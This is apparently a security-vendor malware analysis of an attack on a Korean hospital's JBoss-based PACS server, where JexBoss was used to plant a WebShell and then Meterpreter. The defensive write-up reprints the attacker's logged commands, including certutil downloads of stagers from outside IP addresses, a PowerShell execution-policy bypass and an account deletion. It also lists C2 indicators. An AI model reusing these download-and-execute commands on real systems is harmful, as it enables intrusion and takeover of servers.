While monitoring malware strains distributed to vulnerable servers, the ASEC analysis team discovered an attack case for PACS (Picture Archiving and Communication System) server used by Korean medical institutions.
PACS is a system for digitally managing and transferring medical images of patients, which is used to check and interpret the images without being restrained by time and space.
This system is thus used by many hospitals. As there are multiple PACS vendors, each medical institution may use different PACS systems.
The case presented in this article was an attack against a product that configured its server using a JAVA-based open-source application called ‘dcm4che‘.
dcm4che is an open-source program that supports the processing of medical images by helping with their conversion and management. It provides a web interface for management and allows the user to configure a PACS server without much difficulty. The web container used in the process is JBoss Application.
The attacker targeted a vulnerable server of JBoss Application using a tool called ‘JexBoss.’
JexBoss (JBoss Verify and EXploitation tool) is a vulnerability exploitation tool available on GitHub. Its targets include JBoss Application Server as well as various other Java platforms, frameworks, and applications. JexBoss supports vulnerability scanning of the Java-based environments mentioned above. If there is a vulnerability, it can attack and install a WebShell to gain control of the system.
As JexBoss is an open-source program, it is used by many different attackers due to its accessibility. In 2016, for instance, the SamSam ransomware attacker group attacked and installed ransomware on the JBoss server that was not patched with the vulnerability.
[Reference] Ransomware Attack Case in 2016
In the case presented in this post, the attacker installed a WebShell using JexBoss and ultimately installed Meterpreter Backdoor after reconnaissance.
The attacker can use the Jexboss tool to dominate the system if the JBoss environment did not change the default account credentials or has been using previous versions that were not applied with the vulnerability patch. JexBoss can scan the received address to show the result and install a WebShell without much difficulty.
After scanning with JexBoss, the attacker can perform a vulnerability attack based on the scanning results. The image below shows AhnLab’s ASD log of the attacker installing a WebShell in the system through a vulnerability attack supported by JexBoss. The vulnerable ‘javaservice.exe‘ process installs a WebShell from the URL provided by JexBoss. The WebShell is inside the war file, which is a Java web application file.
The WebShell made with JSP performs the commands received from the attacker in the infected system using ‘cmd.exe’ or ‘bash’ depending on the OS (Windows or Linux).
After the WebShell was installed, the attacker entered the commands. The net command was used to obtain the list of user accounts in the infected environment and remove the user named ‘smoke’. Following that, the attacker used the tasklist command to check the list of the currently running processes.
| Date | Execution Path and Command | Description |
| June 21st, 2022 11:24 | (JexBoss) d:\pacs\dcm4chee-mysql-2.14.5\server\default\tmp\%ASD%\tmp2292506501108616935jexws4.war | Downloads WebShell |
| June 21st, 2022 11:25 | %SystemRoot%\syswow64\net.exe > net user | Shows account credentials |
| June 21st, 2022 11:25 | %SystemRoot%\syswow64\net.exe > net user smoke /del | Deletes ‘smoke’ account |
| June 21st, 2022 11:26 | %SystemRoot%\syswow64\tasklist.exe > tasklist | Shows the list of processes |
The attacker also made the following attempts to install Meterpreter. The table below is a log of downloading PE (executable) and PowerShell-format Metasploit Stager by abusing certutil.exe.
| Time | Path and Command | Description |
| June 21st, 2022 11:28 | %SystemRoot%\syswow64\certutil.exe > -urlcache -split -f “hxxp://62.138.7[.]234:2468/de4444.bat” de.bat | (Unconfirmed) |
| June 21st, 2022 11:29 | %SystemRoot%\syswow64\certutil.exe > -urlcache -split -f “hxxp://62.138.7[.]234:2468/de4444.exe” w.exe | Downloads Meterpreter Stager (PE executable) |
| June 21st, 2022 11:32 | %SystemRoot%\syswow64\certutil.exe > -urlcache -split -f “hxxp://34.220.245[.]178/de.ps1” w.ps1 | Downloads Meterpreter Stager (PowerShell Script) |
| June 21st, 2022 11:32 | %SystemRoot%\syswow64\windowspowershell\v1.0\powershell.exe > -executionpolicy bypass -noexit -file w.ps1 | Attempts to download Meterpreter Stager (PowerShell Script) |
‘de4444.exe’ is Metasploit Stager, a PE-format malware that accesses the C&C server to download the Meterpreter payload in the memory and execute it. As Stager allows attackers to download payloads that perform the feature of a backdoor when needed, its form is simple and can be used for attacks even in a small size.
Although ‘w.ps1’ is currently not found, it is likely to be a powershell-format Stager according to AhnLab’s ASD log. As its features are the same as those of the PE-format Stager, Meterpreter is executed in the memory of the powershell.exe process. The following is a log of Meterpreter loaded in the powershell process communicating with the C&C server after being injected into the winlogon process.
Meterpreter is a backdoor malware that can receive an attacker’s command from the C&C server and perform malicious features. In other words, once Meterpreter is installed, the attacker can gain complete control over the infected system using the Metasploit framework.
Therefore, administrators should change account credentials that are set to default and prevent vulnerability attacks by updating the server to the newest version for vulnerability patches. For public servers, it is also necessary to control external access via security products.
AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:
[Detection]
File Detection
- Downloader/Win.Meterpreter
- WebShell/JSP.Generic
Behavior Detection
- Malware/MDP.Download.M1900
[IOC]
MD5
- 3f156bd68b2a32a1b5cb03af318667f0 (jews.war)
- acda46759d7c3526df2a6c59803586a4 (jexws4.jsp)
- 8fe01532bfa9803f1a9b174289c2cbbc (de4444.exe)
URL & C2
- 62.138.7[.]234:4444
- hxxp://62.138.7[.]234:2468
- hxxp://34.220.245[.]178/de.ps1
- hxxp://62.138.7[.]234:5555
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Reference
https://www.dcm4che.org/
https://github.com/joaomatosf/jexboss
https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-312A
Categories:Malware Information
[…] Meterpreter Distributed to Vulnerable Server of Korean Medical Institution […]
[…] Meterpreter Distributed to Vulnerable Server of Korean Medical Institution […]
[…] Among the web servers that provide web services on Windows servers, prominent examples include the Internet Information Services (IIS) web server, Apache Tomcat web server, JBoss, and Nginx. When these web servers have vulnerabilities that are not patched or are poorly managed, they continuously become the target of attack by various threat actors. ASEC has previously shared a case involving vulnerable Apache Tomcat web servers [1] and another case where JBoss-based PACS (Picture Archiving and Communication System) servers were attacked, resulting in the installation of Metasploit Meterpreter. [2] […]
[…] Among the web servers that provide web services on Windows servers, prominent examples include the Internet Information Services (IIS) web server, Apache Tomcat web server, JBoss, and Nginx. When these web servers have vulnerabilities that are not patched or are poorly managed, they continuously become the target of attack by various threat actors. ASEC has previously shared a case involving vulnerable Apache Tomcat web servers [1] and another case where JBoss-based PACS (Picture Archiving and Communication System) servers were attacked, resulting in the installation of Metasploit Meterpreter. [2] […]